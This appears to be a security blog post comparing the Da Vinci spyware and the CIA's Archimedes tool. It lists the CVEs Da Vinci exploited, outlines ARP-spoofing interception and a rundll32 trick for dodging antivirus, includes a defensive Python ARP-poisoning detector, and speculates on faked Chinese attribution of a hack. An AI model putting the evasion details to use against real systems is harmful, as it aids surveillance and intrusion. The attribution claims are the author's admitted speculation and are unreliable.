Who spying on me? Da Vinci or Archimedes?

Preface:

Archimedes’ principle is a law of physics fundamental to fluid mechanics.

Leonardo Da vinci  is widely considered one of the most diversely talented individuals ever to have lived.

Since they are famous scientists, they dedicated their inventions to the world. But we know the infamous tools in the cyber world used for government surveillance programs, the most famous being eavesdropping malware. Those surveillance tools use a similar naming convention. From a general point of view, it looks like a lack of respect for these two great scientists!

About the Da Vinci spy tool

A powerful spy software developed by the Italian Hacking Team, the tool helps track a person's calls and other communications in real time. This tool is only sold to law enforcement or government agencies. The Italian Hacking Team was hacked by another hacker group in 2015. More than 400GB of data, including source code, internal documents and emails that could reveal the identity of customers, was exposed through an embedded torrent file-share link. Rumours said that the Italian Hacking Team blamed a customer for unethically collecting their technology and hacking them.

About the Archimedes tool

We all know the tool used by the CIA named "Archimedes", opened to the world through WikiLeaks on 5th May 2017. Archimedes was developed by the CIA's Engineering Development Group. The project code name is UMBRAGE. It is an interesting project code name: the definition of umbrage is offence; annoyance; displeasure: to feel umbrage at a social snub; to give umbrage to someone; to take umbrage at someone's rudeness.

Technology

Da Vinci spy tool

The Da Vinci spy tool relies on JAR (Java ARchive), Microsoft Office and Adobe Flash Player design limitations as infection media to fulfil its remote control system (RCS) criteria (see below). A more advanced tool easily fools the cyber defence mechanism, since this is an unknown attack (zero-day), and therefore it is easier to spread the spyware and fulfil its objective.

1. Self-signed JAR
2. CVE-2012-4167: Integer overflow in Adobe Flash Player
3. CVE-2010-3333: Stack-based buffer overflow in Microsoft Office
4. CVE-2012-5054: Integer overflow in the copyRawDataTo method in the Matrix3D class in Adobe Flash Player
5. CVE-2012-1682: Unspecified vulnerability in the Java Runtime Environment (JRE)
6. CVE-2013-0633: Buffer overflow in Adobe Flash Player

Archimedes

Archimedes is an update to Fulcrum 0.6.1. The design objective of Fulcrum: it directs a target machine's HTTP client traffic to the URL of the attacker's choice. The technique involves ARP spoofing to get in the middle and HTTP traffic injection. The simple conceptual idea is shown in the picture below.

Archimedes (Fulcrum 0.6.2) focuses on Windows with high flexibility. The attacker can execute Fulcrum as an EXE with compiled parameters. In order to avoid anti-virus protection, the remote attacker can run it as a DLL via rundll32.exe with command-line parameters. The tool itself is not sophisticated. The attacker can easily get rid of the following files (f32.exe, f32.dll, fs32.exe, fs32.dll, f.cfg and f.log). The normal computer user does not know what is happening.

Capability and Flexibility

Da Vinci spy tool:

Capability: small footprint, unknown vulnerability (zero-day)

Flexibility: anti-virus programs do not easily detect it until the vulnerabilities are found by the vendor

Archimedes:

Capability: small footprint, resembles a normal application program service daemon

Flexibility: anti-virus programs do not easily detect it until the vulnerabilities are found by the vendor

Similarity

Both spy tools (Da Vinci and Archimedes (Fulcrum 0.6.2)) use the inline hooking technique (see below).

However, Archimedes (Fulcrum 0.6.2) looks to have developed its infiltration technique from layer 2, for instance ARP cache poisoning. The two spy tools' entry points (infiltration) look different! Da Vinci focuses more on layer 7 (application) and Archimedes runs at layer 2. It seems hard to prove the integrity of the rumours (that the Italian Hacking Team blamed a customer for unethically collecting their technology and hacking them). But it is not the absolute answer. Let's keep our eyes open on WikiLeaks to know more!
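ARP cache poisoning of the kind described for Archimedes/Fulcrum is visible on the wire: the gateway's IP address suddenly answers from a second MAC address. The Python below is an added example, not code from this post or from the leaked tool; it parses raw Ethernet/ARP frames and alerts when an IP-to-MAC binding changes, which is the classic arpwatch check. The frames are constructed inside the script, not captured.

```python
"""Detect ARP cache poisoning from raw Ethernet/ARP frames (layer-2 entry point above).

Added example, not from the original post or from the leaked tool. The
frames are constructed below; in practice they come from a raw socket or
a pcap on a span port.
"""
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def parse_arp_frame(frame):
    """Return (sender_mac, sender_ip, opcode) for an Ethernet/ARP frame, else None."""
    if len(frame) < 14 + 28:
        return None
    ethertype = struct.unpack_from("!H", frame, 12)[0]
    if ethertype != ETH_P_ARP:
        return None
    # ARP body: htype(2) ptype(2) hlen(1) plen(1) oper(2) sha(6) spa(4) tha(6) tpa(4)
    htype, ptype, hlen, plen, oper = struct.unpack_from("!HHBBH", frame, 14)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None  # only Ethernet/IPv4 ARP is handled
    sha = frame[22:28]
    spa = frame[28:32]
    return mac_str(sha), ip_str(spa), oper


class ArpWatch:
    """IP -> MAC table; every change of an existing binding is reported."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def feed(self, frame):
        parsed = parse_arp_frame(frame)
        if parsed is None:
            return
        mac, ip, _oper = parsed
        known = self.table.get(ip)
        if known is not None and known != mac:
            self.alerts.append((ip, known, mac))   # (ip, old_mac, new_mac)
        self.table[ip] = mac


def build_arp(sender_mac, sender_ip, target_mac, target_ip, oper=ARP_REPLY):
    """Construct an Ethernet/ARP frame (sample data for this example only)."""
    eth = target_mac + sender_mac + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
           + sender_mac + sender_ip + target_mac + target_ip)
    return eth + arp


# Constructed hosts: the gateway, a victim, and a third machine on the segment
GATEWAY_MAC, GATEWAY_IP = bytes.fromhex("001122334455"), bytes([192, 168, 1, 1])
VICTIM_MAC, VICTIM_IP = bytes.fromhex("66778899aabb"), bytes([192, 168, 1, 10])
OTHER_MAC = bytes.fromhex("ccddeeff0011")

SAMPLE_FRAMES = [
    build_arp(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # legitimate reply
    build_arp(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),   # legitimate reply
    build_arp(OTHER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),     # gateway IP now claimed by another MAC
]


def run(frames):
    """Feed frames through the watcher and return the list of binding changes."""
    watcher = ArpWatch()
    for f in frames:
        watcher.feed(f)
    return watcher.alerts


if __name__ == "__main__":
    for ip, old, new in run(SAMPLE_FRAMES):
        print("ALERT: %s moved from %s to %s" % (ip, old, new))
```

A binding change is not always an attack (DHCP reassignments and NIC replacements also trigger it), so the alert is a prompt to compare against the switch's MAC table or the DHCP lease history rather than a verdict on its own.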

Reference:

https://wikileaks.org/vault7/#Archimedes

Proof of idea! Who bears unredressed injustice for APT activities in 2013?

WikiLeaks released a confidential document on 28th April 2017; the details expose how a government enforcement agency (the CIA) counterfeited Russian and Chinese cyber activities. We get a basic understanding of Scribbles. To be honest, it is common for a government agency to take such action. However, this confidential information was exposed. My reflections drove me to review the articles I wrote on another discussion forum on 16th April 2016. I questioned whether engaging in an Advanced Persistent Threat (APT) investigation might mislead the direction of the result. Their mechanism contains many shadow nodes, located in different areas and countries. One can take this advantage and convert it into a political tool. My overall idea on this issue: I can replay a scenario to assemble the story. This is only my speculation and imagination; as a matter of fact, it looks highly possible. If you are interested, please go ahead and read more.

The story from my memory took place about 4 years ago. The email account of a senior person (owner) of a consulting company was hacked. The security guru found that there was Advanced Persistent Threat (APT) activity attributed to China. Rumours said that the people who found this so-called Advanced Persistent Threat (APT) were the Anonymous group. This powerful underground group found this incident and intended to provide hints and fingerprints to let the security consultant find the truth. My personal opinion is that such an incident might contain some shadow nodes; also, it is easy to counterfeit an attack. Today the secret information exposed by WikiLeaks provides more possible factors, and at the same time it makes people question the 2013 result. At least I am one who questions it. Below is my speculation on how the CIA counterfeited cyber activities to let APAC countries, especially China, bear unredressed injustice.

Latest WikiLeaks release shows how the CIA uses computer code to hide the origins of its hacking attacks and ‘disguise them as Russian or Chinese activity’

https://wikileaks.org/vault7/?marble#Marble

Recap of my discussion on 16th April 2016

An unauthorized person gains access to a network and stays there undetected for a long period of time: in cyber security terminology, an APT attack. APT-style attacks confuse security experts. Their mechanism contains many shadow nodes, located in different areas and countries. One can take this advantage and convert it into a political tool. It is a sword: a careerist can blame another country for dishonestly using the internet. Who has cast an unrighted wrong? I believe the attached diagram can give you an idea in this regard.

antihackingonline.com